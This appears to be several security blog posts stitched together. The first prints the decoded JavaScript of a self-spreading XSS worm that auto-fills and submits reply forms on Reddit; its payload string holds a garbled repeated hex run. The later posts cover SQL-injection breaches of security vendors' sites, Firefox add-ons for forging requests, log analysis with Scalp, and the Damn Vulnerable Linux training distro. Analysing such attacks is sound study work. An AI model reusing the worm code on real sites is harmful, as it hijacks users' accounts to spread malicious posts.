The (decoded) code of the worm is the following:

// generate payload/attack vector
// having trouble understanding why this works

z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";

// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?

// "click" all reply links in page
o=document;
e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)
    if(e[i].innerHTML=='reply')
        $(e[i]).click();

// fill with payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i<e.length;i++)
    e[i].value=z;

// submit
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
    if(e[i].innerHTML=='save'&&e[i].style.display!='none')
        $(e[i]).click();

In the meantime of writing the article I tried to look for the invalid filtering in the source code, but as touching for the first time the code had no sense of direction. If someone would be kind enough to enlighten me in which file the code resides I’d be more than happy.

If not, we’ll have an unsolved mystery :)

UPDATE: worm author has happily shared its way of evading the filter.

UPDATE 2: post about the bug on the reddit blog.

The anwser isn’t that simple. Based on the amount of data that could have been leached from the websites (mentioned above) F-Secure looks the trust worthiest. Why F-Secure? Because given their defense-in-depth methodology no sensitive data could have been retrieved, just ordinary data that you may see on other several public pages.

As from any other attack scenario, there is something to be learned. In this case F-Secure and their methodology gave us the lesson. You should never, and I repet never, grant access to important data to a user which interacts with a visitor (in this case, a mysql database user). You will lower the threat by creating different users for different tasks.

Also, I won’t go in complaining about the SQL injections, even if I should, because it’s nothing uncommon. When you have a team of developers which constantly add/remove components and which haven’t got a secure coding methodology (some might sanitize the data on request, others before the usage) SQL injection vulnerabilities (XSS vulnerabilities) will iminently pop up. I said I won’t complain about the vulnerability, but given the fact that they are in the security industry (and not some unknown players) you would expect more…

Another “debate” I’ve seen was based on Acunetix article which mentioned that Unu found the vulnerability in Kaspersky’s website via their scanner. Even if true, we all know that Acunetix Scanner isn’t always enough to catch all the vulnerabilities (as Unu declared also), and no such scanner can. People generally use Acunetix Scanner for a quick and dirty PRELIMINARY scan.

Enough said.

And if you weren’t sure till know, I assure you I’m going to speak about Firefox Addons.

LiveHTTPHeaders

Useful addon for both developers and hackers. It let’s you analyze the HTTP requests and responses done at/from a specified point. It also allows you to modify the requests as you want, from parameters to HTTP headers, anything is possible.

For those that use intercepting proxies in passive mode, for grabbing links while browsing, which later will be passed to some web application scanner (or something like that), guess what: liveHTTPHeaders supports that also.

Download: liveHTTPHeaders

Tamper Data

On several occasions you may want to modify/forge requests in the first submission of a page/form. For that reason Tamper Data is another addon that shouldn’t miss from your toolbox. The functionality I mentioned is just the tip of the iceberg regarding Tamper Data.

Screenshots and download: Tamper Data

HackBar

But what if you don’t need to modify headers, just the content or parameters? Should use Tamper Data just for that?

The answer is obviously NO! Just press F9 (HackBar shortcut key) and you’re ready to tamper/forge requests as you wish. It’s a great addon not just because it eases work with long URLs, but also has the ability to send POST requests for you, thus relieving you from having another window/tab for executing forged POST requests. Did I also mentioned how helpful it can be when working with SQL Injections? No?! I wonder how could I omit that?…

Screenshots and download: HackBar

Final notes

In the end it’s up to you to decide how you’ll do from this point onward. Either work with the suggested plugins, or continue your ritual with intercepting proxies. There is no good/bad way of doing it, it’s just a matter of taste. Some people (including myself) like to do as much possible from the browser before firing up another application…

Maybe not exactly a full step, but you will understand later on why not.

In the ending of the article I mentioned that there is a wordpress plugin that does just that, it is called access log (duh) and you can download it from here. After installing the plugin and configuring it you may also want to decode the REQUEST_URI because that will help later on for analysis. Just add the rawurldecode function to the code:

$href = rawurldecode($_SERVER['REQUEST_URI']);

Another important step after installing/configuring the plugin would be to protect the log directory from unwanted visitors. I use a simple .htaccess file to accomplish the task. The following example denotes the rewrite rule I use:

RewriteRule ^(.*)$ http://insanesecurity.info [R=301,L]

If you’re a stranger towards .htaccess files you might be interested in, a short resource based article I wrote, .htaccess 101.

After a while of log harvesting you might be interested in analyzing the logs and find potential intruders/attackers. That’s when Scalp comes in.

Scalp! is a log analyzer for the Apache web server that aims to look for security problems. The main idea is to look through huge log files and extract the possible attacks that have been sent through HTTP/GET (By default, Apache does not log the HTTP/POST variable).

And this is the reason why we take a partial step, because it doesn’t support custom access log files, thus we cannot analyze POST requests. But let’s give Romain some time, as he’s working on a improved C++ version of it, which hopefully will have this feature.

Among Scalps features (options) are the following:

• tough: Will decode a part of potential attacks (this is done to use better the regexp from PHP-IDS in order to decrease the false-negative rate)
• period: Specify a time-frame to look at, all the rest will be ignored
• sample: Does a random sampling of the log lines in order to look at a certain percentage, this is useful when the user doesn’t want to do a full scan of all the log, but just ping it to see if there is some problem…
• attack: Specify what classes of vulnerabilities the tool will look at (eg, look only for XSS, SQL Injection, etc.)

The things that Scalp can find are: XSS, CSRF, SQL Injection, LFI, RFE (or RFI as some call it), DOS, Directory Transversal, Spam and Information Disclosure.

For more information you can visit the start page of the project here, or just go to the download section here. Almost forgot to mention, Scalp is a python script.

Not done just yet, Scalp works with PHP-IDS’s filters, so you’ll have to download the filter (xml) file from their website to get things working.

Enough said, hopefully Scalp will help you in preventing attackers, rather than helping you in attack forensics.

If there is a phrase that describes in the best way the distribution, it has to be the one from LinuxTracker:

Damn Vulnerable Linux (DVL) is everything a good Linux distribution isn’t. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn’t built to run on your desktop — it’s a learning tool for security students.

To be honest I didn’t play with it till now (even if have been a user of the website for a year or so) because off limited free time that I’ve got. But in the near future (hope so) I will give it a shot, you know demonstrate my “talents” to my work colleague, maybe even do a video to help out DVL.

More specific info about included vulnerabilities/tools you can find on this page, but just up to version 1.4, and the download mirrors can be found here.

If this is an unknown domain for you (security) I would recommend you firstly to start out with some basics before even taking a glimpse at DVL. In such a case you might be interested in David Melnichuk book The Hacker’s Underground Handbook.

Before I forget… You would highly be appreciated for seeding the torrent, not just leeching it, because the free stuff never gets seeded well, IMO.